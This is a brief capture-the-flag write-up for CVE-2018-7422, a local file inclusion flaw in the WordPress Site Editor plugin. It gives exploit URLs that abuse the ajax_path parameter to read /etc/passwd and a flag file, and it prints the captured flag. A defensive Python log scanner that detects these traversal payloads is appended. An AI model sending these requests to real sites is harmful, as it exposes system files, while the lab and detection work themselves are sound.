Chunqiu Yunjing (春秋云镜) range: CVE-2018-7422 WordPress Plugin Site Editor LFI
Target description
WordPress Plugin Site Editor LFI
Start the scenario
Exploitation
exp
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
http://eci-2ze7bah5jftaorfdpcry.cloudeci1.ichunqiu.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
http://eci-2ze7bah5jftaorfdpcry.cloudeci1.ichunqiu.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/…/…/…/…/…/…/flag
Flag obtained
flag{5e724acb-1346-4cb9-8b6b-32cfbeb31b86}
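From the defender's side, this is an added example (not part of the original write-up): a small Python checker that scans web-server access log lines for requests to the Site Editor endpoint used in CVE-2018-7422 whose ajax_path value points outside the plugin directory (absolute path, directory traversal, or null byte). The log lines are constructed, and the endpoint path is the one quoted in the write-up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint abused in CVE-2018-7422 (path taken from the write-up above).
VULN_ENDPOINT = ("/wp-content/plugins/site-editor/editor/extensions/"
                 "pagebuilder/includes/ajax_shortcode_pattern.php")

# Apache/nginx "combined" log format; only the request line and status are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def suspicious_ajax_path(value: str) -> bool:
    """True when an (already once-decoded) ajax_path leaves the plugin directory.

    A second unquote() catches double-encoded payloads such as %252e%252e%252f.
    """
    v = unquote(value).replace("\\", "/")
    return v.startswith("/") or "../" in v or v.endswith("..") or "\x00" in v


def scan_log(lines):
    """Return (client_ip, status, decoded ajax_path) for every request that hits the
    vulnerable endpoint with a suspicious ajax_path. A 200 status on such a request
    suggests the include succeeded and the file contents were returned."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(VULN_ENDPOINT):
            continue
        # parse_qs performs the first layer of percent-decoding.
        for value in parse_qs(parts.query, keep_blank_values=True).get("ajax_path", []):
            if suspicious_ajax_path(value):
                hits.append((m.group("ip"), int(m.group("status")), unquote(value)))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 4096',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET ' + VULN_ENDPOINT + '?ajax_path=pattern.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET ' + VULN_ENDPOINT + '?ajax_path=/etc/passwd HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET ' + VULN_ENDPOINT + '?ajax_path=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, status, path in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} ajax_path={path}")
```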